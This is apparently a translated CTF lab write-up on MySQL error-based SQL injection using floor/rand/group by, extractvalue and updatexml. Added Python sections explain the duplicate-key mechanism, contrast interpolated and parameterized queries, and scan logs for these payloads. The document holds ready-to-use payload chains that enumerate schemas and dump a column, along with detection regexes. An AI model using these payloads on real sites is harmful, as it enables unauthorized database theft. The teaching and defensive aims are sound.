Why call this a "shallow analysis"? Put nicely, it's a shallow analysis; put bluntly, I haven't fully understood the underlying principle.
I roughly know why it works, and I can use it.
Fine, that's my goal for now.


1. floor-based error injection:

This is the floor error-injection template found online:

select * from user where User='root' and (select 1 from (select count(*), concat(database(),floor(rand(0)*2))x from user group by x)a)

Now take it apart piece by piece:
1. Use count to return the number of matching rows

SELECT count(*) FROM user;

(screenshot of the result omitted)


2. Use GROUP BY on its own to group the query result

SELECT * FROM user GROUP BY User;

(screenshot of the result omitted)


3. Feed GROUP BY a specific "random" number; combined with count this raises the error

SELECT count(*) FROM user GROUP BY FLOOR(rand(0)*2);

(screenshot of the error omitted)


4. Concatenate the query expression and the random number with concat

SELECT count(*), concat(database(),FLOOR(rand(0)*2))x FROM user GROUP BY x;

(screenshot of the error omitted)


5. Plugged into the full query:

select * from user where User='root' and (select 1 from (select count(*), concat(database(),floor(rand(0)*2))x from user group by x)a)

As for why floor + count + group by produces an error at all: I hope I live long enough to find out! (doge)
After that, follow the same attack chain as in integer-type injection: enumerate the database, then the tables, then the columns, and dump the contents.
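Since the "why" is left open above, here is the mechanism, as an added illustration that is not part of the original post. When MySQL fills the temporary table behind SELECT count(*) ... GROUP BY <expr>, it evaluates the key expression once to look the group up and, if the group is new, evaluates it a second time to build the row it inserts. A deterministic key gives the same value both times. floor(rand(0)*2) is seeded, so the run is reproducible, but every evaluation yields the next value of the sequence; the value inserted can therefore differ from the value looked up, and a later insert can land on a key that already exists. MySQL reports that as error 1062, "Duplicate entry '...' for key 'group_key'", and whatever was concat'ed into the key is printed inside the message, which is what the technique reads. The Python below models that double evaluation with a constructed key sequence (not a claim about the exact values rand(0) produces) and shows the collision needs at least three source rows.

```python
from typing import Callable, Dict, Iterable, Iterator, List


class DuplicateEntryError(Exception):
    """Stand-in for MySQL error 1062: Duplicate entry '...' for key 'group_key'."""


def group_count(rows: Iterable[object], key_fn: Callable[[], int]) -> Dict[int, int]:
    """Model of how the temporary table behind SELECT count(*) ... GROUP BY <expr> is filled.

    For each source row the key expression is evaluated once to look the group up.
    If the group does not exist yet, the expression is evaluated a second time to
    build the row that gets inserted.  A deterministic expression yields the same
    value both times; a seeded-random one need not, so the inserted key can
    collide with a group that was inserted earlier under a value that was never
    the subject of a lookup.
    """
    groups: Dict[int, int] = {}
    for _row in rows:
        lookup_key = key_fn()              # 1st evaluation: lookup
        if lookup_key in groups:
            groups[lookup_key] += 1
            continue
        insert_key = key_fn()              # 2nd evaluation: insert
        if insert_key in groups:           # the collision MySQL reports as 1062
            raise DuplicateEntryError(
                f"Duplicate entry '{insert_key}' for key 'group_key'")
        groups[insert_key] = 1
    return groups


def fixed_sequence(values: List[int]) -> Callable[[], int]:
    """Constructed stand-in for floor(rand(0)*2): seeded, so the same run every
    time, but a different value on each evaluation."""
    it: Iterator[int] = iter(values)
    return lambda: next(it)


# Constructed key sequence for the demonstration; it is not a claim about the
# exact values MySQL's rand(0) produces, only about their non-constant shape.
DEMO_SEQUENCE = [0, 1, 1, 0, 1, 1, 0, 0, 1, 1]


def errors_after(n_rows: int, sequence: List[int] = DEMO_SEQUENCE) -> bool:
    """True if grouping n_rows source rows by the sequence raises the duplicate-key error."""
    try:
        group_count(range(n_rows), fixed_sequence(sequence))
    except DuplicateEntryError:
        return True
    return False


if __name__ == "__main__":
    print("deterministic key, 5 rows:", group_count(range(5), lambda: 1))
    for n in (1, 2, 3):
        print(f"{n} row(s) with the seeded sequence -> error: {errors_after(n)}")
```

With the constructed sequence, row 1 looks up 0, finds nothing and inserts under 1; row 2 looks up 1 and finds it; row 3 looks up 0, finds nothing, and the insert evaluates to 1 again, which already exists. Two rows never collide, which is why the source table has to supply at least three rows for the error to appear.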

2. extractvalue error-based injection

select * from user where User='root' and extractvalue(1,concat('~', (VERSION())));

extractvalue queries an XML document.
Its second argument is an XPath expression; if that expression is malformed, the error message hands us the result we want:
(screenshot of the error omitted)


3. updatexml error-based injection

updatexml is the function that updates an XML document. It takes three arguments; the second is the XPath path into the XML document.
As with extractvalue, a malformed XPath expression in that position is what the injection relies on.

select * from user where User='root' and updatexml('1',CONCAT('~',DATABASE()),'1')

(screenshot of the error omitted)
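All three techniques above need two things from the application: the input must reach the SQL text unescaped, and the raw database error must be sent back to the client. The following is an added example, not code from the original post, using Python's standard sqlite3 module in memory as a stand-in for the MySQL user table. The vulnerable builder interpolates the user name into the statement, so an input shaped like the extractvalue payload becomes SQL and the error text comes straight back; the hardened version binds it as a parameter, so the same input matches no row, and any database error is logged server-side while the client only sees a generic message. In sqlite the injected function names simply do not exist, so what the vulnerable path shows is the open error channel, not MySQL's XPath message. The table contents and the INJECTED_INPUT string are constructed.

```python
import logging
import sqlite3
from typing import List, Tuple

log = logging.getLogger("db")

# Constructed input of the shape used in the extractvalue section above
# (closing quote, injected predicate, comment to swallow the rest).  It is a
# plain string here: the code only shows how each path treats it.
INJECTED_INPUT = "root' and extractvalue(1,concat('~',version())) -- "


def setup_db() -> sqlite3.Connection:
    """In-memory sqlite3 stands in for the MySQL 'user' table of the post."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table user (User text, Password text)")
    conn.execute("insert into user values ('root', 'constructed-hash')")
    conn.commit()
    return conn


def build_query_vulnerable(user: str) -> str:
    """String interpolation: whatever the client sends becomes SQL text."""
    return f"select * from user where User='{user}'"


def run_vulnerable(conn: sqlite3.Connection, user: str) -> Tuple[List[tuple], str]:
    """Executes the interpolated statement and hands the raw database error back
    to the caller: the two properties every technique on this page depends on."""
    try:
        return conn.execute(build_query_vulnerable(user)).fetchall(), ""
    except sqlite3.Error as exc:
        return [], str(exc)                  # raw error text reaches the client


def run_hardened(conn: sqlite3.Connection, user: str) -> Tuple[List[tuple], str]:
    """Bound parameter plus opaque error: the input is sent as a value, never
    parsed as SQL, and any database error stays in the server log."""
    try:
        rows = conn.execute("select * from user where User=?", (user,)).fetchall()
        return rows, ""
    except sqlite3.Error as exc:
        log.error("user lookup failed for %r: %s", user, exc)
        return [], "request failed"          # nothing about the database leaks


if __name__ == "__main__":
    db = setup_db()
    print("vulnerable, legit input :", run_vulnerable(db, "root"))
    print("vulnerable, injected    :", run_vulnerable(db, INJECTED_INPUT))
    print("hardened,   injected    :", run_hardened(db, INJECTED_INPUT))
    print("hardened,   legit input :", run_hardened(db, "root"))
```

The parameter binding is the fix; the opaque error message is the second layer, and it is what turns a remaining injection from an error-based one into a blind one, which is slower and noisier for the attacker and easier to spot in logs.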


Skill-tree error-based blind injection, hands-on

First, swap the user table from our Navicat setup for the "badass" view, information_schema.tables:

1 and (select 1 from (select count(*), concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)

(screenshot of the error omitted)


Then try to read the tables in the database:

1 and (select 1 from (select count(*), concat((select group_concat(table_name) from information_schema.tables where table_schema=database()),floor(rand(0)*2))x from information_schema.tables group by x)a)

(screenshot of the error omitted)


Error: Subquery returns more than 1 row
So group_concat can't be used here to merge all the rows; they have to be read one at a time:

1 and (select 1 from (select count(*), concat((select table_name from information_schema.tables where table_schema=database() limit 1,2),floor(rand(0)*2))x from information_schema.tables group by x)a)

(screenshot of the error omitted)


Here we see the flag table.

Then read its columns:

1 and (select 1 from (select count(*), concat((select column_name from information_schema.columns where table_schema=database() and table_name='flag' limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)

(screenshot of the error omitted)


Then dump the column's value:

1 and (select 1 from (select count(*), concat((select flag from sqli.flag),floor(rand(0)*2))x from information_schema.columns group by x)a)

(screenshot of the error omitted)


The whole flow:
Enumerate the database (this step works without the information_schema view as well).

1 and (select 1 from (select count(*), concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)

Then the tables
1 and (select 1 from (select count(*), concat((select table_name from information_schema.tables where table_schema=database() limit 1,2),floor(rand(0)*2))x from information_schema.tables group by x)a)

Then the columns (the column list lives in information_schema.columns, as in the step above)
1 and (select 1 from (select count(*), concat((select column_name from information_schema.columns where table_schema=database() and table_name='flag' limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)

Dump the column data
1 and (select 1 from (select count(*), concat((select flag from sqli.flag),floor(rand(0)*2))x from information_schema.columns group by x)a)

The whole thing can simply borrow the method from integer-type injection; the payloads are just much more complicated.
Because integer-type injection needs visible output, you have to use order by to find out how many columns there are and work out which of them are echoed;
otherwise it just fails.

Then the extractvalue method: because this function returns at most 32 characters, use substring:
(screenshot of the error omitted)

After the regular retrieval, use substring to fetch the rest of the flag.
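Every payload in the recap above leaves two traces a defender can key on: the function names in the request (floor(rand( with group by, extractvalue(, updatexml(, and the information_schema lookups), and, if the application forwards database errors, the MySQL error text in the response. The following is an added example, not part of the original post. It runs those request signatures over a constructed access-log sample that carries the page's three payload shapes URL-encoded, and checks a response body for the leaked error strings; the log format, client address, timestamps and response bodies are all constructed.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote_plus

# Request-side signatures for the payload shapes used on this page.  Matching
# runs on the URL-decoded, lower-cased request target so that %20, '+' and
# mixed case do not hide a call.
REQUEST_RULES: Dict[str, re.Pattern] = {
    "floor_rand_groupby": re.compile(r"floor\s*\(\s*rand\s*\(.*?group\s+by", re.S),
    "extractvalue":       re.compile(r"extractvalue\s*\("),
    "updatexml":          re.compile(r"updatexml\s*\("),
    "schema_enumeration": re.compile(r"information_schema\s*\.\s*(tables|columns)"),
}

# Response-side signals: MySQL error text that the application forwarded to the
# client.  Any of these in a response body means the error channel is open.
RESPONSE_RULES: Dict[str, re.Pattern] = {
    "xpath_error":         re.compile(r"XPATH syntax error"),
    "duplicate_group_key": re.compile(r"Duplicate entry .* for key 'group_key'"),
    "sql_syntax_error":    re.compile(r"You have an error in your SQL syntax"),
}

# Common Log Format: ip ident user [ts] "METHOD target PROTO" status size
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def normalize_target(target: str) -> str:
    """Decode twice (payloads are often double-encoded) and lower-case."""
    return unquote_plus(unquote_plus(target)).lower()


def scan_request_log(lines: List[str]) -> List[Tuple[int, str, List[str]]]:
    """Return (line number, client ip, matched rule names) for suspicious requests."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_LINE.match(line)
        if not m:
            continue                       # blank or non-CLF line
        target = normalize_target(m.group("target"))
        matched = [name for name, rx in REQUEST_RULES.items() if rx.search(target)]
        if matched:
            hits.append((n, m.group("ip"), matched))
    return hits


def response_leaks_db_error(body: str) -> List[str]:
    """Names of the database error signatures found in a response body."""
    return [name for name, rx in RESPONSE_RULES.items() if rx.search(body)]


# Constructed access-log sample: one benign request, then the three payload
# shapes from this page as they would appear URL-encoded, then a blank line.
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Mar/2020:01:26:30 +0800] "GET /sqli/?id=1 HTTP/1.1" 200 512',
    '192.0.2.10 - - [26/Mar/2020:01:26:31 +0800] "GET /sqli/?id=1+and+(select+1+from+(select+count(*),concat(database(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) HTTP/1.1" 500 231',
    '192.0.2.10 - - [26/Mar/2020:01:26:32 +0800] "GET /sqli/?id=1%20and%20extractvalue(1%2Cconcat(%27~%27%2Cversion())) HTTP/1.1" 500 180',
    '192.0.2.10 - - [26/Mar/2020:01:26:33 +0800] "GET /sqli/?id=1%20and%20UPDATEXML(1%2CCONCAT(%27~%27%2CDATABASE())%2C1) HTTP/1.1" 500 180',
    "",
]

if __name__ == "__main__":
    for line_no, ip, rules in scan_request_log(SAMPLE_LOG):
        print(f"line {line_no} from {ip}: {', '.join(rules)}")
    # constructed response body of the kind the extractvalue section screenshots
    print(response_leaks_db_error("XPATH syntax error: '~5.7.26-log'"))
```

The request rules are deliberately loose on whitespace and case because the page's own payloads already mix both; the response rules are the higher-confidence signal, since a 500 with a MySQL error string in the body confirms the application leaks errors regardless of what the request looked like.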